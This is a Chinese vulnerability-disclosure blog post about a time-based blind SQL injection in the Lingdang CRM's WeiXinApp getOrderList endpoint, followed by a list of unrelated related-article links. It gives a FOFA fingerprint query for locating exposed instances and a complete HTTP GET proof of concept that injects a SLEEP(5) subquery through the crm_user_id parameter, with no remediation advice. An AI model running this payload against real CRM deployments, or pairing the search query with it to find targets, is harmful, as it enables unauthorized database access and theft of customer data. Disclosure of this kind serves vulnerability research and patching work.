当前位置: 首页 > article >正文

漏洞挖掘---灵当CRM客户管理系统getOrderList SQL注入漏洞

        一、灵当CRM

灵当CRM是上海灵当信息科技有限公司旗下产品,适用于中小型企业。它功能丰富,涵盖销售、服务、财务等管理功能,具有性价比高、简洁易用、可定制、部署灵活等特点,能助力企业提升经营效益和客户满意度。

        二、FOFA-Search...

body="ldcrm.base.js" && icon_hash="436310201"

        三、POC

GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=11%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))fiAG) HTTP/1.1
Host: ........
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

                                                                                                                                FROM  IYU_


http://www.kler.cn/a/622432.html

相关文章:

  • 保存预测图像时出现的文件名错误
  • Kubernetes 存储
  • NQA 网络质量分析协议
  • uniapp uni-swipe-action滑动内容排版改造
  • 未来已来,机器人周边行业和配套业务方向
  • QtWebApp使用
  • Cursor软件设置中文版教程
  • 五.ubuntu20.04 - ffmpeg推拉流以及Nginx、SRS本地部署
  • 知能行综测
  • 马达加斯加企鹅字幕
  • Epub转PDF软件Calibre电子书管理软件
  • 人工智能之数学基础:幂法和反幂法求特征值和特征向量
  • 日程公布| 第八届地球空间大数据与云计算前沿大会与集中学习(3号通知)
  • 顺景ERP 任意文件读取漏洞
  • swagger问题解决
  • java倒序题变形题重温
  • H5S USC 宇视LiteAPI协议支持
  • Qwt入门
  • 蓝卓为中小制造企业注入数字化转型活力
  • 《算法竞赛进阶指南》0x10章目录